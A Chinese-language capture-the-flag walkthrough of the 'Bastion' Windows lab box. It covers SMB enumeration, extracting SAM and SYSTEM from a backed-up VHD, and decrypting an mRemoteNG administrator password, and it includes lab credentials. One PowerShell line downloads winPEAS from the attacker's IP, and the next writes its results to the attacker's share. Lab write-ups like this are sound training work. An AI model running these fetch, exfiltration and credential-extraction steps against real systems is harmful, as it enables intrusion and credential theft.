Bastion-Writeup

概述 (Overview)

59830615.png

  • MACHINE TAGS
    • Windows
    • Powershell
    • File Misconfiguration

攻击链 (Kiillchain)

通过 nmap 进行端口识别,发现SMB服务,存在匿名访问 Backups 目录。从中发现 .VHD 后缀文件,对其进行挂载得到 SAMSYSTEM 文件,提取密码后成功登录目标服务器。最后通过在 mRemoteNG 软件的历史连接配置文件,解密后的密码登录 administrator 用户会话。

TTPs (Tactics, Techniques & Procedures)

  • nmap
  • smbclient
  • impacket
  • mremoteng_decrypt

阶段1:枚举

开局使用nmap扫描目标服务器暴露端口及服务:

PORT    STATE SERVICE      VERSION                                                                                                                          
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)                                                                                           
| ssh-hostkey:                                                                                                                                              
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)                                                                                              
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -40m00s, deviation: 1h09m15s, median: -1s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-07T08:07:02+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-07T06:07:03
|_  start_date: 2021-07-07T06:02:25

系统指纹是 Windows Server 2016,存在 SMB 服务、ssh 远程服务。

msrpc 的服务可以使用nmap的脚本 msrpc-enum 进行服务的信息枚举。

阶段2:工具和利用

阶段2.1:对MSRPC服务的枚举

file: msrpc-enum
查询 MSRPC 端点映射器以获取映射服务列表并显示收集的信息。

接着可以使用 impacket-rpcdump 来查看运行的进程,和nmap的脚本组合可以识别更多信息:

52165781.png

阶段2.2:SMB共享服务匿名访问

使用 smbclient 枚举下 SMB 服务是否存在匿名访问:

51697190.png

Backups 目录里发现提示信息文件:

52500116.png

在 smbclient 中设置如下参数后进行递归下来:

mask ""
recurse ON
prompt OFF

53939095.png

看下 note.txt 文件内容:

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
系统管理员:请不要将整个备份文件传输到本地,到分支机构的VPN太慢了。

阶段2.3:VHD文件提取

了解下 .VHD 的后缀文件是个啥:

.VHD文件包含 Microsoft Windows Virtual PC(Windows) 使用的虚拟硬盘映像。 它用于虚拟化程序存储虚拟机(VM)硬盘的内容,其中可能包括磁盘分区,文件系统,文件和文件夹。 VHD文件可用于在一台计算机上安装多个操作系统,测试软件程序或运行较旧的应用程序。

所以正常的解题需要将完整的 .VHD 备份全部下载下来,我看了下我才下了800m的样子,实际上这个备份有5G(出题的是伞兵吧?要不是我这VPN给力,谁闲的慌下5G的备份文件啊,一般的出海梯子不会给大出口带宽的)…
55497756.png

55468405.png

使用 mount 进行共享文件挂载,方便进一步查看文件:$ mount -t cifs -o username=root //10.10.10.134/Backups <local_file>
56837936.png

.VHD 获取到本地后进行对其进行挂载,就能查看系统文件了。从中找到 SAMSYSTEM 文件对密码进行提取:

C:\WIndows\System32\config\SAM
C:\Windows\System32\config\SYSTEM

成功对用户 l4mpje 解出来密码是 password : bureaulampje,使用该密码组成功目标服务器,获得 user flag。

57559323.png

阶段3:权限提升

阶段3.1:文件传递后的信息枚举

通过 powershell 将 winPEAS 工具传递目标服务器,随后通过开启的 smbserver 接收分析后的结果:

cmd > powershell (new-object system.net.webclient).downloadfile('http://10.10.16.15/winPEASany.exe','C://Users/L4mpje/Downloads/winPEASany.exe');
cmd> l4mpje@BASTION C:\Users\L4mpje\Downloads>.\winPEASany.exe > //10.10.16.15/share/winPEASany.txt

查看枚举的信息,发现一个可疑的应用 mRemoteNG(用于Windows的远程连接管理器):

59000046.png

在目录中查找配置备份信息,发现存在 administrator 用户的连接记录:

59428039.png

阶段3.2:decrypt密码

Administrator:aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

在Github上找到了解密脚本,对密码信息解析还原:

# python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2

使用解出来的密码成功登录目标系统的 administrator 会话:
59783605.png

参考


版权声明

除非另有说明,本网站上的内容均根据 Creative Commons Attribution-ShareAlike License 4.0 International (CC BY-SA 4.0) 获得许可。